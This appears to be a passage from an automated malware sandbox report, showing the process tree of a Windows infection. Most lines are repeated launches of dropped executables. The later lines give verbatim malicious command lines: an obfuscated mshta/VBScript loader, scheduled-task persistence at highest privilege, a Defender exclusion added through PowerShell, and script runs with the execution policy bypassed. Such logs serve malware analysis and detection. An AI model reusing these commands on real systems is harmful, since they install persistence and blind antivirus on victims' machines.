C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6168
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9816
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2564
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4820
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2100
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7992
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2540
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9356
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10276
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10512 -s 284⤵
- Program crash
PID:10852
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10768
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10316
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10892
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4068
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11284
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11908
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8472
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11536
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12168
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12788
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 284⤵
- Program crash
PID:14116
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10440
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14108
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13628
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13848
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11032
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10092
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11028
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14712
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:15324
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12776
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10276
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14456
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12612
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13092
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8164
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:15984
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16304
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12572
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16008
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10280
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16356
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14212
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14896
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13172
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:15740
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:15884
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14952
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14528
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:2092
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1376
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14328
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13000
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16224
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4864
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16948
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13392
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13408
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5844
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:17660
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:17980
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:18148
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:18376
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:18028
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14956
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5008
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:17908
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:4776
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:17112
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12900
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9992
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6000
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:18368
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6672
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13048
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16140
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11196
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1148
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:992
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12448
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12820
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11612
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11988
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16268
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:992
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11648
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9556
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:17724
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:11688
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:15152
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:17444
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6024
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12696
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:17652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17652 -s 284⤵
- Program crash
PID:1644
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:6432
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:1232
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:8228
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:7356
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3932
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14056
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13420
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:12120
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9800
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:18308
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10244
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14952
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 284⤵
- Program crash
PID:11088
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9096
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13452
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16256
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9432
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:13544
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:3884
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:15008
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:18328
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:5920
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:10668
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:16428
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:14688
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵PID:9532
-
-
-
C:\Users\Admin\Documents\i9Ug0Yhw5wIgttQylm6TglZd.exe"C:\Users\Admin\Documents\i9Ug0Yhw5wIgttQylm6TglZd.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2476 -
C:\Users\Admin\Documents\i9Ug0Yhw5wIgttQylm6TglZd.exe"C:\Users\Admin\Documents\i9Ug0Yhw5wIgttQylm6TglZd.exe"3⤵PID:4772
-
-
-
C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe"C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe"2⤵
- Executes dropped EXE
PID:1040 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )3⤵PID:4648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ("C:\Users\Admin\Documents\fwJPGcKeapxGI5TMIlFg4jU2.exe" ) do taskkill -F -im "%~NxQ"4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExEBX0iUoFB.EXe -PyTJSIPDC12bsxp0f15⤵
- Executes dropped EXE
PID:5608 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )6⤵PID:5560
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ("C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"7⤵PID:5740
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac6⤵
- Loads dropped DLL
PID:5560
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -im "fwJPGcKeapxGI5TMIlFg4jU2.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
-
-
-
-
C:\Users\Admin\Documents\7eEWh0L0pAvqqP97gK6ntuOs.exe"C:\Users\Admin\Documents\7eEWh0L0pAvqqP97gK6ntuOs.exe"2⤵
- Executes dropped EXE
PID:3336
-
-
C:\Users\Admin\Documents\wRjVMQ1PYxXtiVtgmNMf7BTO.exe"C:\Users\Admin\Documents\wRjVMQ1PYxXtiVtgmNMf7BTO.exe"2⤵
- Executes dropped EXE
PID:3136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 2763⤵
- Program crash
PID:1180
-
-
-
C:\Users\Admin\Documents\hPpyHuT7psBThm6HyOXDo1aV.exe"C:\Users\Admin\Documents\hPpyHuT7psBThm6HyOXDo1aV.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3992
-
-
C:\Users\Admin\Documents\854WcJGsU9ff7sZQkeCXMgYJ.exe"C:\Users\Admin\Documents\854WcJGsU9ff7sZQkeCXMgYJ.exe"2⤵
- Executes dropped EXE
PID:2996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 3163⤵
- Program crash
PID:4076
-
-
-
C:\Users\Admin\Documents\IS_NZxa8lhsvv7R9sciRpeRY.exe"C:\Users\Admin\Documents\IS_NZxa8lhsvv7R9sciRpeRY.exe"2⤵
- Executes dropped EXE
PID:1280 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3996
-
-
-
C:\Users\Admin\Documents\69RtbxtHnFhksAVvQdMnJQA2.exe"C:\Users\Admin\Documents\69RtbxtHnFhksAVvQdMnJQA2.exe"2⤵
- Executes dropped EXE
PID:1296
-
-
C:\Users\Admin\Documents\yCOvp7UX24Wr6u_GM4KLa_3O.exe"C:\Users\Admin\Documents\yCOvp7UX24Wr6u_GM4KLa_3O.exe"2⤵
- Executes dropped EXE
PID:3200 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\YCOVP7~1.DLL,s C:\Users\Admin\DOCUME~1\YCOVP7~1.EXE3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1104 -
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\YCOVP7~1.DLL,b1YZclNJMzc=4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\YCOVP7~1.DLL5⤵PID:1160
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp911D.tmp.ps1"5⤵PID:6496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp50A1.tmp.ps1"5⤵PID:9536
-
C:\Windows\SysWOW64\nslookup.exe"C:\Windows\system32\nslookup.exe" -type=any localhost6⤵PID:6116
-
-
-
